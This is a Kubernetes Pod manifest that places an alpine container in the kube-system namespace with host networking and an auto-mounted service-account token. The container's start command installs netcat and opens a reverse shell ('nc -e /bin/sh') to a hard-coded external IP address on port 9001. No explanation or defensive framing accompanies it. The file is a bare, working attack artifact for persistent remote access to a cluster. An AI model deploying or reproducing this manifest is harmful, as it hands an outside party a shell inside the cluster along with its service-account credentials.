apiVersion: v1
kind: Pod
metadata:
  name: alpine
  namespace: kube-system
spec:
  containers:
  - name: alpine
    image: alpine
    command: ["/bin/sh"]
    args: ["-c", "apk update && apk add curl netcat-openbsd -y --no-cache; nc -e /bin/sh 188.227.84.184 9001"]
  serviceAccountName: service-account-controller
  automountServiceAccountToken: true
  hostNetwork: true
